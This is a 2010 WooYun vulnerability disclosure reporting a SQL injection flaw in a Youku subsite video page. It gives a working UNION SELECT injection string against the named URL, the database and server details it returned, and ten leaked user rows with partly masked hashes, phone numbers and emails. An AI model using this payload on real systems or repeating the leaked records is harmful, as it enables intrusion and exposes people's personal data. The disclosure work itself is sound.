优酷某分站存在SQLInjection ROOT权限

编号733
Urlhttp://www.wooyun.org/bug.php?action=view&id=733
漏洞状态厂商已经确认
漏洞标题优酷某分站存在SQLInjection ROOT权限
漏洞类型SQL注射漏洞
厂商优酷
白帽子孤狐浪子
提交日期2010-10-26 14:30:00
公开日期2010-11-25 15:00:00
修复时间(not set)
确认时间2010-10-26 00:00:00
Confirm Spend0
漏洞标签注射技巧 php+字符类型注射
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank10
漏洞简介
优酷视频分站Sql注射漏洞,爆出数据库结构, 主机相关信息,导致信息泄漏,导致大量用户信息泄漏。非常之严重。管理速补。
漏洞细节

http://minisite.youku.com/t2211/video.php
?vid=XMTU1MjI1NTk2' AnD 1=2 UnIoN aLl SeLeCt CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@dAtadir,@@tmpDir,@@baseDir),2 %23

POC

利用方式:

http://minisite.youku.com/t2211/video.php
?vid=XMTU1MjI1NTk2' AnD 1=2 UnIoN aLl SeLeCt CONCAT_WS(CHAR(32,58,32),@@VerSion_compile_Os,vErsioN(),uSer(),datAbase(),sysTem_user(),@@dAtadir,@@tmpDir,@@baseDir),2 %23


相关漏洞证明:

Version:5.0.75-percona-highperf-b11-log
Version_OS:redhat-linux-gnu
User:[email protected]
DataBase:minisite
System_User:[email protected]
Current_User:[email protected]%


部分用户

1|pkss|xxxx68cb874bf42a7a3ef3a9c95c5e|1354xx942|[email protected]
2|kieteay|xxxxx280b1f0f7b581094370c47f|13424xx379|[email protected]
3|we|xxxxx49ba59abbe56e057f20f883e|12232xxx231|[email protected]
4|ww|xxxxxba59abbe56e057f20f883e|1233433xxx534|[email protected]
5|yyp|xxxxxc260ca15affdc38877106|1380013xx00|[email protected]
6|carmen|xxxx188863f9d8d4146d34f4bd7a|135xx10776|[email protected]
7|carmennow|xxxxxacc2cc222648dc37ad6f2c3f1|1368xxx260631|[email protected]
8|iokiey|xxxxxxx9a280b1f0f7b581094370c47f|13424xx45379|[email protected]
9|985266|xxxxxx280b1f0f7b581094370c47f||[email protected]
10|zqmen|xxxxxx126a8fe4deb5c1b4d7cdc2ee|1319xx69031|[email protected]

修复方案

鸟哥懂的。

状态信息 2010-10-26: 细节已通知厂商并且等待厂商处理中
2010-10-26: 厂商已经确认,细节仅向厂商公开
2010-11-05: 细节向核心白帽子及相关领域专家公开
2010-11-15: 细节向普通白帽子公开
2010-11-25: 细节向实习白帽子公开
2010-11-25: 细节向公众公开
厂商回复修复中
回应信息危害等级:中漏洞Rank:10 确认时间:2010-10-26 15:23